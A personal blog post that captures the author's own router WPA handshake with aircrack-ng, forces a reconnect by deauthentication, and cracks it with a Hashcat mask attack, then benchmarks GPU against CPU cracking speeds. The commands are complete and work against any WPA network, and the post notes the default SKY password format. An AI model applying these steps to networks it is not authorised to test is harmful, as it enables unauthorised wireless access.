An interesting alternate use of GPU acceleration (aside from training neural-networks) naturally lies in the realm of password-cracking. I was curious about the speed-up this provided relative to multi-processing on the CPU and decided to try it out myself. First, I need some data.

Step A: Collecting the Data (Capturing my router’s WPA Handshake)

I set-up a virtual-machine with Kali 2.0 on my MacBook, plugged in my Alfa AWUS036NHA and proceeded with the following commands:

airmon-ng # check the name of my wireless card

airmon-ng check kill # stop processes to restart in monitoring mode

airmon-ng start wlan0 # restart in monitoring mode

airodump-ng wlan0mon # start the sniffer

01.png

airodump-ng -c (my router’s channel) –bssid (my router’s MAC) –essid (my router’s network name) -w (name of capture file) wlan0mon # Optionally specifying the network’s name just to keep track and make sure I’m not accidentally sniffing a foreign network

02.png

Now I am locked onto the channel and the frequency of SKY Router and just need to kick-off my iPhone so that it reconnects and I can capture the WPA-handshake:

aireplay-ng -0 (number of deauths) -a (my router’s MAC) -c (my iPhone’s MAC) wlan0mon # I issue 10 requests to disconnect my iPhone

03

The WPA handshake is successfully captured. Now I just need to clean it for Hashcat to contain only the handshake:

wpaclean (clean output name).cap (input name).cap

04

Finally converting it into a .hccap file:

aicrack-ng (clean output name).cap -J (final file)

05

Step B: Hashcat + Nvidia GTX 980

I create a small script (.bat) file with the following lines of code:

cd “C:\cudahash-2.01”
cudaHashcat64.exe -m 2500 -a3 hash_test\(final file).hccap ?u?u?u?u?u?u?u?u
pause

This type of brute-force attack is a called a mask attack and helps me save a great deal of time. I know that SKY routers have 8 upper-case characters (producing a character-space of 208,827,064,576 possibilities).

Now the interesting stuff begins: we notice that GTX 980 is ripping through at a rate of 211,300 keys a second. At that rate we have an expected cracking-duration of around 6 days.

06

The average speed I was getting on the CPU (using aircrack-ng) was just below 5,000 keys a second -> more than 40x faster!

i7_4790

Using a slightly better CPU (Xeon E5 2687) we can up this to 7,610 keys a second:

E5_2687Xeon

In fact, running the same operation on a friend’s laptop (GPU-accelerated), we hit: 15,000 keys a second (3x faster )

Interestingly, I got lucky and the algorithm cracked in around 7 hours:

07

As an aside – running on a powerful 16-core server (E5-2667) gets us 16,240 words a second (about the same as a GPU on a mid-level gaming laptop):

server

Step C: Some lower-cost DIY solutions

The GTX 980 is very expensive and currently stands at around £500 (it was purchased for around £900). I was curious of a cheaper solution (getting cheaper cards on eBay and running the algorithm on multiple cards) and opted for 2 GTX 770s which I found on eBay for around £100 each used.

I decided to mount these on the top of my computer for maximum ventilation with a bit of drilling:

FullSizeRender_1

FullSizeRender

FullSizeRender_2

FullSizeRender_4

The end-result was interesting: hitting around 115,000 keys a second (across both cards). Which is relatively more expensive than the GTX 980, however I think a good option for those not willing to knock out £500 + on a Graphics Card!

IMG_9545

Summary:
GTX 980X – 211,300
GTX 770 – 55,000
E5-2667 (16 core) – 16,240
Laptop GPU – 15,000
E5-2687 (8 core) – 7,610
i7 4790 (4 core) – 4,530